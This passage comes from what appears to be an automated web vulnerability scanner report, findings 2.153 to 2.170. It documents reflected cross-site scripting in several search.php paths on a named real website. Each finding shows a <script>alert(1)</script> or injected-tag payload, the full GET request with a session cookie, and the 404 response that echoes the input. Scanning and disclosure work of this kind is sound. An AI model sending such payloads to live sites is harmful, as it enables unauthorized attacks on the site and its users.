Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7f8dc<a>c7aea4a1b23&opt=2 was not found on this server.</p>
...[SNIP]...

2.153. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bd10a<a>568f266672 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/search.php?keyword=search...bd10a<a>568f266672&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/search.php?keyword=search...bd10a<a>568f266672&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.154. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 685bc<script>alert(1)</script>be72e11b98f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&685bc<script>alert(1)</script>be72e11b98f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&685bc<script>alert(1)</script>be72e11b98f=1 was not found on this server.</p>
...[SNIP]...

2.155. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 1cb22<a>48447151198 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=21cb22<a>48447151198 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=21cb22<a>48447151198 was not found on this server.</p>
...[SNIP]...

2.156. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e03c<script>alert(1)</script>e3e2ca9da62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult2e03c<script>alert(1)</script>e3e2ca9da62/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult2e03c<script>alert(1)</script>e3e2ca9da62/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.157. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df327<script>alert(1)</script>e0cdaaf125e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chatdf327<script>alert(1)</script>e0cdaaf125e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatdf327<script>alert(1)</script>e0cdaaf125e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.158. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 17071<script>alert(1)</script>8f103a4606 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes17071<script>alert(1)</script>8f103a4606/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes17071<script>alert(1)</script>8f103a4606/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.159. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78aeb<script>alert(1)</script>ceb284645ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos78aeb<script>alert(1)</script>ceb284645ba/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos78aeb<script>alert(1)</script>ceb284645ba/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.160. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 80919<script>alert(1)</script>a1987097124 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/search.php80919<script>alert(1)</script>a1987097124?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/search.php80919<script>alert(1)</script>a1987097124?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.161. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 96086<a>a4840878056 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search96086<a>a4840878056&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search96086<a>a4840878056&opt=2 was not found on this server.</p>
...[SNIP]...

2.162. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e737a<a>edd04ff9331 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/search.php?keyword=search...e737a<a>edd04ff9331&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/search.php?keyword=search...e737a<a>edd04ff9331&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.163. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6951<script>alert(1)</script>9baf8cfdda8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e6951<script>alert(1)</script>9baf8cfdda8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e6951<script>alert(1)</script>9baf8cfdda8=1 was not found on this server.</p>
...[SNIP]...

2.164. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c9a3b<a>1f4a4269ca2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c9a3b<a>1f4a4269ca2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c9a3b<a>1f4a4269ca2 was not found on this server.</p>
...[SNIP]...

2.165. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cdb16<script>alert(1)</script>8334b993b77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultcdb16<script>alert(1)</script>8334b993b77/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultcdb16<script>alert(1)</script>8334b993b77/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.166. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 41b10<script>alert(1)</script>6a31b63013a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat41b10<script>alert(1)</script>6a31b63013a/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat41b10<script>alert(1)</script>6a31b63013a/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.167. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 899a3<script>alert(1)</script>3a7ebb1ad3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes899a3<script>alert(1)</script>3a7ebb1ad3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes899a3<script>alert(1)</script>3a7ebb1ad3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.168. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24aa1<script>alert(1)</script>76fcbc1ab92 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/search.php24aa1<script>alert(1)</script>76fcbc1ab92?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/search.php24aa1<script>alert(1)</script>76fcbc1ab92?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.169. http://www.resellerbase.com/adult/media-chat/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e3557<a>4183794c2ae was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/search.php?keyword=search...&Submit3=Searche3557<a>4183794c2ae&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/search.php?keyword=search...&Submit3=Searche3557<a>4183794c2ae&opt=2 was not found on this server.</p>
...[SNIP]...

2.170. http://www.resellerbase.com/adult/media-chat/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f3214<a>f285eb5af96 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

